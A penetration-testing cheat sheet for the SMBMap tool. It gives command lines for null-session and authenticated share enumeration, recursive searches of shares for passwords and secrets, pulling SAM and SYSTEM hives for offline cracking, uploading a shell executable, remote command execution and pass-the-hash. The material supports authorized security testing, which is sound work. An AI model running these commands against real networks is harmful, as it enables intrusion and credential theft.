Ir al contenido
1337skills 1337skills - Hojas de Trucos

SMBMap

Overview

Sección titulada «Overview»

SMBMap is a handy SMB enumeration tool written in Python that allows you to enumerate samba share drives across an entire domain. Useful for SMB security testing and finding sensitive files on Windows networks.

Installation

Sección titulada «Installation»

Linux / macOS

Sección titulada «Linux / macOS»
# Via pip (recommended)
pip3 install smbmap

# Via git
git clone https://github.com/ShawnDEvans/smbmap.git
cd smbmap
pip3 install -r requirements.txt
python3 smbmap.py --help

Windows

Sección titulada «Windows»
# Via pip
pip install smbmap

# Or download and run directly
python smbmap.py [options]

Docker

Sección titulada «Docker»
docker run -it --rm smbmap/smbmap:latest smbmap.py --help

Basic Usage

Sección titulada «Basic Usage»

Help and Version

Sección titulada «Help and Version»
smbmap -h                           # Show help
smbmap --version                    # Show version

Required Parameters

Sección titulada «Required Parameters»
-H, --host <ip>                    # Target host or IP
-u, --username <user>              # Username (optional for null sessions)
-p, --password <pass>              # Password
-d, --domain <domain>              # Domain name

Null Session Enumeration

Sección titulada «Null Session Enumeration»

Enumerate Without Credentials

Sección titulada «Enumerate Without Credentials»
smbmap -H 192.168.1.100                                    # No auth
smbmap -H 192.168.1.100 -u '' -p ''                      # Null session with explicit empty creds
smbmap -H 192.168.1.100 -u 'anonymous'                   # Anonymous user

Check for Null Session Vulnerability

Sección titulada «Check for Null Session Vulnerability»
smbmap -H 192.168.1.100 2>&1 | grep -i "accessible\|readable"

Guest and Unauthenticated Access

Sección titulada «Guest and Unauthenticated Access»
smbmap -H 192.168.1.100 -u 'guest' -p ''                 # Guest account
smbmap -H 192.168.1.100 --no-color                       # Disable color output

Authenticated Enumeration

Sección titulada «Authenticated Enumeration»

Basic Authentication

Sección titulada «Basic Authentication»
smbmap -H 192.168.1.100 -u 'admin' -p 'password123'      # Username/password
smbmap -H 192.168.1.100 -d DOMAIN -u 'admin' -p 'pass'  # With domain

List All Shares

Sección titulada «List All Shares»
smbmap -H 192.168.1.100 -u 'admin' -p 'password123'      # Shows all accessible shares
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L          # List only shares (compact)

Check Specific Share

Sección titulada «Check Specific Share»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$'     # Enumerate C$ share
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users'  # Enumerate Users share

Share and Permission Enumeration

Sección titulada «Share and Permission Enumeration»

Share Enumeration Output

Sección titulada «Share Enumeration Output»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass'
# Output shows:
# Share name | Type | Permissions | Comment
# IPC$ | STYPE_IPC | NO ACCESS | (null)
# ADMIN$ | STYPE_DISKTREE | READ, WRITE | Remote Admin
# C$ | STYPE_DISKTREE | NO ACCESS | Default share
# Users | STYPE_DISKTREE | READ | User directory

Identify Writable Shares

Sección titulada «Identify Writable Shares»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' | grep WRITE

Parse Results for Analysis

Sección titulada «Parse Results for Analysis»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -q          # Quiet mode (minimal output)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -v          # Verbose output

File Enumeration

Sección titulada «File Enumeration»

Recursive File Listing

Sección titulada «Recursive File Listing»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r
# Recursively list all files in Users share

List Specific Directory

Sección titulada «List Specific Directory»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r 'Documents'
# List Documents folder recursively

Find Files by Pattern

Sección titulada «Find Files by Pattern»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r | grep -i '.txt\|.pdf\|.xls'

File Download and Upload

Sección titulada «File Download and Upload»

Download Files

Sección titulada «Download Files»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -D 'Documents/file.txt'
# Download file to current directory

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -D 'Windows/System32/config/sam'
# Download SAM file (requires admin)

Download Entire Directory

Sección titulada «Download Entire Directory»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r | xargs -I {} \
  smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -D '{}'

Upload Files

Sección titulada «Upload Files»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -U 'shell.exe'
# Upload shell.exe to root of Users share

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -U 'shell.exe' -T 'Temp/'
# Upload to specific directory

File Content Search

Sección titulada «File Content Search»

Search for Keywords in Files

Sección titulada «Search for Keywords in Files»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r -A 'password\|secret\|api'
# Search recursively for sensitive keywords

Search Specific File Extensions

Sección titulada «Search Specific File Extensions»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r -A 'password' -F '*.txt\|*.conf'

Output Search Results

Sección titulada «Output Search Results»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r -A 'password' -o 'results.txt'

Remote Command Execution

Sección titulada «Remote Command Execution»

Execute Commands (Requires Admin)

Sección titulada «Execute Commands (Requires Admin)»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'ipconfig'
# Execute ipconfig command

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'whoami'
# Check current user context

Execute with Specific Share

Sección titulada «Execute with Specific Share»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -x 'cmd.exe /c whoami'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'ADMIN$' -x 'powershell.exe'

Execute Multiple Commands

Sección titulada «Execute Multiple Commands»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'whoami && hostname && systeminfo'

Pass-the-Hash Attacks

Sección titulada «Pass-the-Hash Attacks»

Using NTLM Hash

Sección titulada «Using NTLM Hash»
smbmap -H 192.168.1.100 -u 'admin' -p '8846f7eaee8fb117ad06bdd830b7586c:8846f7eaee8fb117ad06bdd830b7586c'
# Format: LM:NT hash (can be same if only NT available)

PTH with Domain

Sección titulada «PTH with Domain»
smbmap -H 192.168.1.100 -d DOMAIN -u 'admin' -p 'hash:hash'

Combine with Command Execution

Sección titulada «Combine with Command Execution»
smbmap -H 192.168.1.100 -u 'admin' -p 'hash:hash' -x 'whoami'

Domain Enumeration

Sección titulada «Domain Enumeration»

Scan Network Range

Sección titulada «Scan Network Range»
for ip in 192.168.1.{1..254}; do
  timeout 2 smbmap -H $ip -u 'guest' -p '' 2>/dev/null | grep -i accessible && echo "Found: $ip"
done

Enumerate All Domain Machines

Sección titulada «Enumerate All Domain Machines»
smbmap -H 192.168.1.1 -u 'admin' -p 'pass' -L | grep -i 'STYPE_DISKTREE' | awk '{print $1}'

Find Printers and Shared Resources

Sección titulada «Find Printers and Shared Resources»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' | grep -E 'print\|share\|backup'

Common Flags Reference

Sección titulada «Common Flags Reference»
FlagDescription
-H, --hostTarget host IP or hostname
-u, --usernameUsername for authentication
-p, --passwordPassword for authentication
-d, --domainDomain name (for domain users)
-LList shares only (no file enumeration)
-s, --shareSpecify a single share to enumerate
-rRecursively list directory contents
-A, --searchSearch for string in files
-F, --filterFilter files by extension
-D, --downloadDownload a file
-U, --uploadUpload a file
-x, --executeExecute a command (RCE)
-o, --outfileOutput results to file
-q, --quietQuiet mode
-v, --verboseVerbose output
--no-colorDisable colored output

Integration with Other Tools

Sección titulada «Integration with Other Tools»

CrackMapExec Integration

Sección titulada «CrackMapExec Integration»
# SMBMap can be chained with CrackMapExec for comprehensive testing
cme smb 192.168.1.0/24 -u admin -p password --shares
# Then use smbmap for deeper enumeration

crackmapexec smb 192.168.1.100 -u admin -p pass -x 'whoami'  # For execution

NetExec (CrackMapExec Successor)

Sección titulada «NetExec (CrackMapExec Successor)»
nxc smb 192.168.1.100 -u admin -p pass --shares
# Modern alternative to CrackMapExec

Combine with Enum4linux

Sección titulada «Combine with Enum4linux»
enum4linux 192.168.1.100                    # Get user/group info
smbmap -H 192.168.1.100 -u 'user' -p 'pass' # Then enumerate shares

Export to Tools like BloodHound

Sección titulada «Export to Tools like BloodHound»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -q > shares.txt
# Parse and import share access info into BloodHound for AD analysis

Advanced Techniques

Sección titulada «Advanced Techniques»

Enumerate Hidden Shares

Sección titulada «Enumerate Hidden Shares»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L
# Will show hidden shares ending with $

Find Domain Admin Shares

Sección titulada «Find Domain Admin Shares»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L | grep -i 'admin\|domain\|netlogon\|sysvol'

Backup File Discovery

Sección titulada «Backup File Discovery»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -r -A 'backup\|\.bak\|\.sql\|\.db' -F '.*\.(bak|sql|db|backup)$'
Sección titulada «Configuration File Search»
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -r -A 'password\|api\|secret' -F '.*\.(conf|config|ini|xml|json)$'

Privilege Escalation Path Finding

Sección titulada «Privilege Escalation Path Finding»
# Download SYSTEM and SAM files for offline cracking
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -D 'Windows/System32/config/SYSTEM'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -D 'Windows/System32/config/SAM'

Troubleshooting

Sección titulada «Troubleshooting»

Connection Refused

Sección titulada «Connection Refused»
# Ensure SMB port 445 is open
nmap -p 445 192.168.1.100

# Try with SMB version specification
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' --smbv2

Authentication Failed

Sección titulada «Authentication Failed»
# Verify credentials and domain
smbmap -H 192.168.1.100 -d DOMAIN.COM -u 'DOMAIN\admin' -p 'password'

# Check for account lockout
smbmap -H 192.168.1.100 -u 'admin' -p 'wrongpass' -v

Command Execution Not Working

Sección titulada «Command Execution Not Working»
# Requires appropriate share access (usually C$ or ADMIN$)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -x 'whoami'

# May need elevated privileges
smbmap -H 192.168.1.100 -u 'domain\admin' -p 'pass' -x 'whoami'

Timeout Issues

Sección titulada «Timeout Issues»
# Increase timeout for slow networks
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -v
# Add verbose flag to see timeout errors

Security Notes

Sección titulada «Security Notes»
  • Always obtain proper authorization before testing SMB shares
  • Null sessions may be disabled on modern systems but still worth checking
  • Pass-the-hash attacks require NTLM hash of user (not cleartext password)
  • Command execution typically requires local admin or system access
  • Monitor logs for SMBMap activity (Event ID 4625 for failed logins)
  • Use VPN/proxies appropriately for remote engagements
  • Credentials should be handled securely (use -p with caution in shell history)
Sección titulada «Related Tools»
  • nmap — Network scanning and SMB enumeration
  • enum4linux — Linux-based SMB enumeration
  • CrackMapExec — Comprehensive SMB exploitation framework
  • NetExec — Modern successor to CrackMapExec
  • smbclient — Command-line SMB/CIFS client
  • impacket — Python library for SMB protocol manipulation
  • Metasploit — Framework with SMB modules